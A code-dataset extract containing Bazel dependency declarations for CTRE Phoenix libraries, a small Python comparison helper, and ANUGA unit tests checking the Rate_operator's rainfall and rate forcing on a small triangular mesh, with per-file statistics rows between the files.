url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/wpiapi-cpp-sim/5.20.2/wpiapi-cpp-sim-5.20.2-windowsx86-64.zip",
sha256 = "39f7440688040829b645562c4329788dcdedf9d3d6a80e6fe30a5bb4a12747d5",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_wpiapi-cpp-sim_linuxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/wpiapi-cpp-sim/5.20.2/wpiapi-cpp-sim-5.20.2-linuxx86-64.zip",
sha256 = "d571b60c6bbaf4e2559c0b3df579ff6dce35c3f5292e389737854aaae25d6fb7",
build_file_content = cc_library_shared,
)
maybe(
http_archive,
"__bazelrio_com_ctre_phoenix_sim_wpiapi-cpp-sim_osxx86-64",
url = "https://maven.ctr-electronics.com/release/com/ctre/phoenix/sim/wpiapi-cpp-sim/5.20.2/wpiapi-cpp-sim-5.20.2-osxx86-64.zip",
sha256 = "ef679db4752e49f5d3cc354ec9b5cc46cdc9ce04dd296a10a7cf07b34bfbe71e",
build_file_content = cc_library_shared,
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_com_ctre_phoenix_api-java",
artifact = "com.ctre.phoenix:api-java:5.20.2",
artifact_sha256 = "ea09e2c76e2c605187782a42b1c217c1c5b64d9b2b9803045b3a1a0208d7237f",
server_urls = ["https://maven.ctr-electronics.com/release"],
)
maybe(
jvm_maven_import_external,
name = "__bazelrio_com_ctre_phoenix_wpiapi-java",
artifact = "com.ctre.phoenix:wpiapi-java:5.20.2",
artifact_sha256 = "64611652eae1d4da7558e3cb8267f44908670d2e2586895fbc1a1dd3bd099940",
server_urls = ["https://maven.ctr-electronics.com/release"],
)
| 52.125436 | 141 | 0.725401 | 1,706 | 14,960 | 6.05041 | 0.053927 | 0.054253 | 0.108506 | 0.105406 | 0.806142 | 0.799361 | 0.79316 | 0.74937 | 0.734741 | 0.712846 | 0 | 0.177463 | 0.164171 | 14,960 | 286 | 142 | 52.307692 | 0.648033 | 0 | 0 | 0.459649 | 0 | 0.133333 | 0.621858 | 0.32627 | 0 | 0 | 0 | 0 | 0 | 1 | 0.003509 | true | 0 | 0.010526 | 0 | 0.014035 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 1 | 1 | 1 | 1 | 1 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 8 |
3ff6909b15f26268e9a67e399ec5df75467d7ed2 | 44 | py | Python | sim21/support/kludges.py | kpatvt/sim21 | 4cbbfcbef6371d3dc5404429545e003a48c69ba5 | [
"Artistic-2.0"
] | 7 | 2021-08-23T18:46:27.000Z | 2022-01-26T07:10:22.000Z | sim21/support/kludges.py | kpatvt/sim21 | 4cbbfcbef6371d3dc5404429545e003a48c69ba5 | [
"Artistic-2.0"
] | null | null | null | sim21/support/kludges.py | kpatvt/sim21 | 4cbbfcbef6371d3dc5404429545e003a48c69ba5 | [
"Artistic-2.0"
] | null | null | null | def cmp(a, b):
return (a > b) - (a < b)
| 14.666667 | 28 | 0.409091 | 9 | 44 | 2 | 0.555556 | 0.333333 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.340909 | 44 | 2 | 29 | 22 | 0.62069 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.5 | false | 0 | 0 | 0.5 | 1 | 0 | 1 | 1 | 0 | null | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 1 | 0 | 0 | 0 | 1 | 1 | 0 | 0 | 7 |
b7c0d0e10452de60a2a87af7bbb2b976565e2c4f | 36,342 | py | Python | anuga/operators/tests/test_rate_operators.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | null | null | null | anuga/operators/tests/test_rate_operators.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | null | null | null | anuga/operators/tests/test_rate_operators.py | samcom12/anuga_core | f4378114dbf02d666fe6423de45798add5c42806 | [
"Python-2.0",
"OLDAP-2.7"
] | null | null | null | """ Test environmental forcing - rain, wind, etc.
"""
from __future__ import print_function
from __future__ import division
from builtins import range
from past.utils import old_div
from future.utils import raise_
import operator
import unittest, os
import anuga
import numpy
from anuga import Domain
from anuga import Reflective_boundary
from anuga import rectangular_cross_domain
from anuga import file_function
from anuga.config import netcdf_mode_r, netcdf_mode_w, netcdf_mode_a
from anuga.file_conversion.file_conversion import timefile2netcdf
from anuga.config import time_format
from anuga.fit_interpolate.interpolate import Modeltime_too_early
from anuga.fit_interpolate.interpolate import Modeltime_too_late
from anuga.operators.rate_operators import *
import numpy as num
import warnings
import time
import os
warnings.simplefilter("ignore")
verbose = False
class Test_rate_operators(unittest.TestCase):
def setUp(self):
pass
def tearDown(self):
try:
os.remove('test_file_function.txt')
except:
pass
try:
os.remove('test_file_function.tms')
except:
pass
def test_rate_operator_simple(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
domain = Domain(points, vertices)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
# Apply operator to these triangles
indices = [0,1,3]
rate = 1.0
factor = 10.0
default_rate= 0.0
operator = Rate_operator(domain, rate=rate, factor=factor, \
indices=indices, default_rate = default_rate)
# Apply Operator
domain.timestep = 2.0
operator()
stage_ex = [ 21., 21., 1., 21.]
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
assert num.allclose(domain.fractional_step_volume_integral, factor*domain.timestep*(rate*domain.areas[indices]).sum())
# test timestepping_statistics
stats = operator.timestepping_statistics()
import re
rr = re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)
assert num.allclose (float(rr[1]), 1.0)
assert num.allclose (float(rr[2]), 60.0)
def test_rate_operator_negative_rate(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
domain = Domain(points, vertices)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
# print domain.quantities['elevation'].centroid_values
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
# Apply operator to these triangles
indices = [0,1,3]
#Catchment_Rain_Polygon = read_polygon(join('CatchmentBdy.csv'))
#rainfall = file_function(join('1y120m.tms'), quantities=['rainfall'])
rate = -1.0
factor = 10.0
default_rate= 0.0
operator = Rate_operator(domain, rate=rate, factor=factor, \
indices=indices, default_rate = default_rate)
# Apply Operator
domain.timestep = 2.0
operator()
stage_ex = [ 0., 0., 1., 0.]
step_integral = -6.0
#print domain.quantities['elevation'].centroid_values
#print domain.quantities['stage'].centroid_values
#print domain.quantities['xmomentum'].centroid_values
#print domain.quantities['ymomentum'].centroid_values
#print domain.fractional_step_volume_integral
#print factor*domain.timestep*(rate*domain.areas[indices]).sum()
#increment = factor*domain.timestep*rate*domain.areas
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
assert num.allclose(domain.fractional_step_volume_integral, step_integral)
# test timestepping_statistics
stats = operator.timestepping_statistics()
import re
rr = re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)
assert num.allclose(float(rr[1]), -1.0)
assert num.allclose(float(rr[2]), -60.0)
def test_rate_operator_negative_rate_full(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
domain = Domain(points, vertices)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0)
domain.set_quantity('stage', 10.0)
domain.set_quantity('friction', 0)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
# print domain.quantities['elevation'].centroid_values
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
# Apply operator to these triangles
indices = [0,1,3]
#Catchment_Rain_Polygon = read_polygon(join('CatchmentBdy.csv'))
#rainfall = file_function(join('1y120m.tms'), quantities=['rainfall'])
rate = -1.0
factor = 10.0
default_rate= 0.0
operator = Rate_operator(domain, rate=rate, factor=factor, \
indices=None, default_rate = default_rate)
# Apply Operator
domain.timestep = 2.0
operator()
stage_ex = [ 0., 0., 0., 0.]
step_integral = -80.0
#print domain.quantities['elevation'].centroid_values
#print domain.quantities['stage'].centroid_values
#print domain.quantities['xmomentum'].centroid_values
#print domain.quantities['ymomentum'].centroid_values
#print domain.fractional_step_volume_integral
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
assert num.allclose(domain.fractional_step_volume_integral, step_integral)
# test timestepping_statistics
stats = operator.timestepping_statistics()
import re
rr = re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)
assert num.allclose(float(rr[1]), -1.0)
assert num.allclose(float(rr[2]), -80.0)
def test_rate_operator_rate_from_file(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
#---------------------------------
#Typical ASCII file
#---------------------------------
finaltime = 1200
filename = 'test_file_function'
fid = open(filename + '.txt', 'w')
start = time.mktime(time.strptime('2000', '%Y'))
dt = 60 #One minute intervals
t = 0.0
while t <= finaltime:
t_string = time.strftime(time_format, time.gmtime(t+start))
fid.write('%s, %f %f %f\n' %(t_string, 2*t, t**2, sin(old_div(t*pi,600))))
t += dt
fid.close()
#Convert ASCII file to NetCDF (Which is what we really like!)
timefile2netcdf(filename+'.txt')
#Create file function from time series
F = file_function(filename + '.tms',
quantities = ['Attribute0',
'Attribute1',
'Attribute2'])
#Now try interpolation
for i in range(20):
t = i*10
q = F(t)
#Exact linear intpolation
assert num.allclose(q[0], 2*t)
if i%6 == 0:
assert num.allclose(q[1], t**2)
assert num.allclose(q[2], sin(old_div(t*pi,600)))
#Check non-exact
t = 90 #Halfway between 60 and 120
q = F(t)
assert num.allclose( old_div((120**2 + 60**2),2), q[1] )
assert num.allclose( old_div((sin(old_div(120*pi,600)) + sin(old_div(60*pi,600))),2), q[2] )
t = 100 #Two thirds of the way between between 60 and 120
q = F(t)
assert num.allclose( old_div(2*120**2,3) + old_div(60**2,3), q[1] )
assert num.allclose( old_div(2*sin(old_div(120*pi,600)),3) + old_div(sin(old_div(60*pi,600)),3), q[2] )
#os.remove(filename + '.txt')
#os.remove(filename + '.tms')
domain = Domain(points, vertices)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
# print domain.quantities['elevation'].centroid_values
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
# Apply operator to these triangles
indices = [0,1,3]
rate = file_function(filename + '.tms', quantities=['Attribute1'])
# Make starttime of domain consistent with tms file starttime
domain.set_starttime(rate.starttime)
factor = 1000.0
default_rate= 17.7
operator = Rate_operator(domain, rate=rate, factor=factor, \
indices=indices, default_rate = default_rate)
# Apply Operator
domain.set_time(360.0)
domain.timestep = 1.0
operator()
d = domain.get_time()**2 * factor + 1.0
stage_ex0 = [ d, d, 1., d]
# print d, domain.get_time(), F(360.0)
# print domain.quantities['elevation'].centroid_values
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex0)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
assert num.allclose(domain.fractional_step_volume_integral, ((d-1.)*domain.areas[indices]).sum())
domain.set_time(1300.0)
domain.timestep = 1.0
operator()
d = default_rate*factor + d
stage_ex1 = [ d, d, 1., d]
# print domain.quantities['elevation'].centroid_values
# print domain.quantities['stage'].centroid_values
# print domain.quantities['xmomentum'].centroid_values
# print domain.quantities['ymomentum'].centroid_values
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex1)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
assert num.allclose(domain.fractional_step_volume_integral, ((d-1.)*domain.areas[indices]).sum())
tmp = numpy.zeros_like(domain.quantities['stage'].centroid_values)
tmp[:] = domain.quantities['stage'].centroid_values
d0 = domain.fractional_step_volume_integral
domain.set_time(-10.0)
domain.timestep = 1.0
operator()
d = default_rate*factor
stage_ex2 = numpy.array([ d, d, 0., d]) + numpy.array(stage_ex1)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex2)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
assert num.allclose(domain.fractional_step_volume_integral, d0+(d*domain.areas[indices]).sum())
# test timestepping_statistics
stats = operator.timestepping_statistics()
import re
rr = re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)
assert num.allclose(float(rr[1]), 17.7)
assert num.allclose(float(rr[2]), 106200.0)
def test_rate_operator_functions_rate_default_rate(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
domain = Domain(points, vertices)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
if verbose:
print(domain.quantities['elevation'].centroid_values)
print(domain.quantities['stage'].centroid_values)
print(domain.quantities['xmomentum'].centroid_values)
print(domain.quantities['ymomentum'].centroid_values)
# Apply operator to these triangles
indices = [0,1,3]
factor = 10.0
def main_rate(t):
if t > 20:
msg = 'Model time exceeded.'
raise_(Modeltime_too_late, msg)
else:
return 3.0 * t + 7.0
default_rate = lambda t: 3*t + 7
operator = Rate_operator(domain, rate=main_rate, factor=factor, \
indices=indices, default_rate = default_rate)
# Apply Operator
domain.timestep = 2.0
operator()
t = operator.get_time()
d = operator.get_timestep()*main_rate(t)*factor + 1
stage_ex = [ d, d, 1., d]
if verbose:
print("Time ", operator.get_time())
print("Rate ", main_rate(t))
print(domain.quantities['elevation'].centroid_values)
print(domain.quantities['stage'].centroid_values)
print(domain.quantities['xmomentum'].centroid_values)
print(domain.quantities['ymomentum'].centroid_values)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
assert num.allclose(domain.fractional_step_volume_integral, ((d-1.)*domain.areas[indices]).sum())
domain.set_time(30.0)
domain.timestep = 1.0
operator()
t = operator.get_time()
d = operator.get_timestep()*default_rate(t)*factor + d
stage_ex = [ d, d, 1., d]
if verbose:
print("Time ", operator.get_time())
print("Rate ", default_rate(t))
print(domain.quantities['elevation'].centroid_values)
print(domain.quantities['stage'].centroid_values)
print(domain.quantities['xmomentum'].centroid_values)
print(domain.quantities['ymomentum'].centroid_values)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
# test timestepping_statistics
stats = operator.timestepping_statistics()
import re
rr = re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)
if verbose:
print('Operator Statistics: ',stats)
print('Extracted values: ',rr)
print('get_Q: ', operator.get_Q())
print('Get rate value: ', operator.get_non_spatial_rate())
print('Areas: ', operator.areas)
assert num.allclose(float(rr[1]), 97.0)
assert num.allclose(float(rr[2]), 5820.0)
def test_rate_operator_functions_spatial(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
domain = Domain(points, vertices)
area = numpy.sum(domain.areas)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0.0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0.0)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
verbose = False
if verbose:
print(domain.quantities['elevation'].centroid_values)
print(domain.quantities['stage'].centroid_values)
print(domain.quantities['xmomentum'].centroid_values)
print(domain.quantities['ymomentum'].centroid_values)
# Apply operator to these triangles
factor = 10.0
def main_spatial_rate(x,y,t):
# x and y should be an n by 1 array
return x + y
default_rate = 0.0
operator = Rate_operator(domain, rate=main_spatial_rate, factor=factor, \
default_rate = default_rate)
# Apply Operator
domain.timestep = 2.0
operator()
t = operator.get_time()
Q = operator.get_Q()
x = operator.coord_c[:,0]
y = operator.coord_c[:,1]
rate = main_spatial_rate(x,y,t)*factor
Q_ex = num.sum(domain.areas*rate)
d = operator.get_timestep()*rate + 1
#print "d"
#print d
#print area, Q, Q_ex
stage_ex = num.array([ 1.0, 1.0, 1.0, 1.0])
stage_ex[:] = d
if verbose:
print(domain.quantities['elevation'].centroid_values)
print(domain.quantities['stage'].centroid_values)
print(domain.quantities['xmomentum'].centroid_values)
print(domain.quantities['ymomentum'].centroid_values)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
assert num.allclose(Q_ex, Q)
# test timestepping_statistics
stats = operator.timestepping_statistics()
import re
rr = re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)
assert num.allclose(float(rr[1]), 1.33333)
assert num.allclose(float(rr[2]), 3.33333)
assert num.allclose(float(rr[3]), 213.33333)
#operator_5: Min rate = 1.33333 m/s, Max rate = 3.33333 m/s, Total Q = 213.333 m^3/s
def test_rate_operator_functions_spatial_with_ghost(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
domain = Domain(points, vertices)
area = numpy.sum(domain.areas)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0.0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0.0)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
verbose = False
if verbose:
print(domain.quantities['elevation'].centroid_values)
print(domain.quantities['stage'].centroid_values)
print(domain.quantities['xmomentum'].centroid_values)
print(domain.quantities['ymomentum'].centroid_values)
# Apply operator to these triangles
factor = 10.0
def main_spatial_rate(x,y,t):
# x and y should be an n by 1 array
return x + y
default_rate = 0.0
# kludge to make a ghost cell
domain.tri_full_flag[1] = 0
operator = Rate_operator(domain, rate=main_spatial_rate, factor=factor, \
default_rate = default_rate)
# Apply Operator
domain.timestep = 2.0
operator()
t = operator.get_time()
Q_all = operator.get_Q(full_only=False)
Q_full = operator.get_Q()
x = operator.coord_c[:,0]
y = operator.coord_c[:,1]
rate = main_spatial_rate(x,y,t)*factor
Q_ex_all = num.sum(domain.areas*rate)
Q_ex_full = num.sum(num.where(domain.tri_full_flag==1,domain.areas*rate,0.0))
d = operator.get_timestep()*rate + 1
#print "d"
#print d
#print Q_ex_full, Q_ex_all
stage_ex = num.array([ 1.0, 1.0, 1.0, 1.0])
stage_ex[:] = d
if verbose:
print(domain.quantities['elevation'].centroid_values)
print(domain.quantities['stage'].centroid_values)
print(domain.quantities['xmomentum'].centroid_values)
print(domain.quantities['ymomentum'].centroid_values)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
assert num.allclose(Q_ex_all, Q_all)
assert num.allclose(Q_ex_full, Q_full)
assert num.allclose(domain.fractional_step_volume_integral, ((d-1.)*domain.areas*domain.tri_full_flag).sum())
# test timestepping_statistics
stats = operator.timestepping_statistics()
import re
rr = re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)
assert num.allclose(float(rr[1]), 1.33333)
assert num.allclose(float(rr[2]), 3.33333)
assert num.allclose(float(rr[3]), 160.0)
def test_rate_operator_functions_spatial_indices(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
domain = Domain(points, vertices)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0.0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0.0)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
verbose = False
if verbose:
print(domain.quantities['elevation'].centroid_values)
print(domain.quantities['stage'].centroid_values)
print(domain.quantities['xmomentum'].centroid_values)
print(domain.quantities['ymomentum'].centroid_values)
# Apply operator to these triangles
indices = [0,1,3]
factor = 10.0
def main_spatial_rate(x,y,t):
# x and y should be an n by 1 array
return x + y
default_rate = 0.0
operator = Rate_operator(domain, rate=main_spatial_rate, factor=factor, \
indices=indices, default_rate = default_rate)
# Apply Operator
domain.timestep = 2.0
operator()
t = operator.get_time()
Q = operator.get_Q()
x = operator.coord_c[indices,0]
y = operator.coord_c[indices,1]
rate = main_spatial_rate(x,y,t)*factor
Q_ex = num.sum(domain.areas[indices]*rate)
d = operator.get_timestep()*rate + 1
#print "d"
#print d
stage_ex = num.array([ 1.0, 1.0, 1.0, 1.0])
stage_ex[indices] = d
if verbose:
print(domain.quantities['elevation'].centroid_values)
print(domain.quantities['stage'].centroid_values)
print(domain.quantities['xmomentum'].centroid_values)
print(domain.quantities['ymomentum'].centroid_values)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
assert num.allclose(Q_ex, Q)
assert num.allclose(domain.fractional_step_volume_integral, ((d-1.)*domain.areas[indices]).sum())
# test timestepping_statistics
stats = operator.timestepping_statistics()
import re
rr = re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)
assert num.allclose(float(rr[1]), 1.33333)
assert num.allclose(float(rr[2]), 3.33333)
assert num.allclose(float(rr[3]), 146.667)
def test_rate_operator_rate_quantity(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
domain = Domain(points, vertices)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0.0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0.0)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
verbose = False
if verbose:
print(domain.quantities['elevation'].centroid_values)
print(domain.quantities['stage'].centroid_values)
print(domain.quantities['xmomentum'].centroid_values)
print(domain.quantities['ymomentum'].centroid_values)
# Apply operator to these triangles
indices = [0,1,3]
factor = 10.0
from anuga import Quantity
rate_Q = Quantity(domain)
rate_Q.set_values(1.0)
operator = Rate_operator(domain, rate=rate_Q, factor=factor, \
indices=indices)
# Apply Operator
domain.timestep = 2.0
operator()
rate = rate_Q.centroid_values[indices]
t = operator.get_time()
Q = operator.get_Q()
rate = rate*factor
Q_ex = num.sum(domain.areas[indices]*rate)
d = operator.get_timestep()*rate + 1
#print "d"
#print d
#print Q_ex
#print Q
stage_ex = num.array([ 1.0, 1.0, 1.0, 1.0])
stage_ex[indices] = d
verbose = False
if verbose:
print(domain.quantities['elevation'].centroid_values)
print(domain.quantities['stage'].centroid_values)
print(domain.quantities['xmomentum'].centroid_values)
print(domain.quantities['ymomentum'].centroid_values)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
assert num.allclose(Q_ex, Q)
assert num.allclose(domain.fractional_step_volume_integral, ((d-1.)*domain.areas[indices]).sum())
# test timestepping_statistics
stats = operator.timestepping_statistics()
import re
rr = re.findall("[-+]?[.]?[\d]+(?:,\d\d\d)*[\.]?\d*(?:[eE][-+]?\d+)?", stats)
assert num.allclose(float(rr[1]), 1.0)
assert num.allclose(float(rr[2]), 1.0)
assert num.allclose(float(rr[3]), 60.0)
def test_rate_operator_functions_empty_indices(self):
from anuga.config import rho_a, rho_w, eta_w
from math import pi, cos, sin
a = [0.0, 0.0]
b = [0.0, 2.0]
c = [2.0, 0.0]
d = [0.0, 4.0]
e = [2.0, 2.0]
f = [4.0, 0.0]
points = [a, b, c, d, e, f]
# bac, bce, ecf, dbe
vertices = [[1,0,2], [1,2,4], [4,2,5], [3,1,4]]
domain = Domain(points, vertices)
#Flat surface with 1m of water
domain.set_quantity('elevation', 0.0)
domain.set_quantity('stage', 1.0)
domain.set_quantity('friction', 0.0)
Br = Reflective_boundary(domain)
domain.set_boundary({'exterior': Br})
verbose = False
if verbose:
print(domain.quantities['elevation'].centroid_values)
print(domain.quantities['stage'].centroid_values)
print(domain.quantities['xmomentum'].centroid_values)
print(domain.quantities['ymomentum'].centroid_values)
# Apply operator to these triangles
indices = []
factor = 10.0
def main_spatial_rate(x,y,t):
# x and y should be an n by 1 array
return x + y
default_rate = 0.0
domain.tri_full_flag[0] = 0
operator = Rate_operator(domain, rate=main_spatial_rate, factor=factor, \
indices=indices, default_rate = default_rate)
# Apply Operator
domain.timestep = 2.0
operator()
t = operator.get_time()
Q = operator.get_Q()
x = operator.coord_c[indices,0]
y = operator.coord_c[indices,1]
rate = main_spatial_rate(x,y,t)*factor
Q_ex = num.sum(domain.areas[indices]*rate)
d = operator.get_timestep()*rate + 1
# print Q_ex, Q
# print indices
# print "d"
# print d
stage_ex = num.array([ 1.0, 1.0, 1.0, 1.0])
stage_ex[indices] = d
if verbose:
print(domain.quantities['elevation'].centroid_values)
print(domain.quantities['stage'].centroid_values)
print(domain.quantities['xmomentum'].centroid_values)
print(domain.quantities['ymomentum'].centroid_values)
assert num.allclose(domain.quantities['stage'].centroid_values, stage_ex)
assert num.allclose(domain.quantities['xmomentum'].centroid_values, 0.0)
assert num.allclose(domain.quantities['ymomentum'].centroid_values, 0.0)
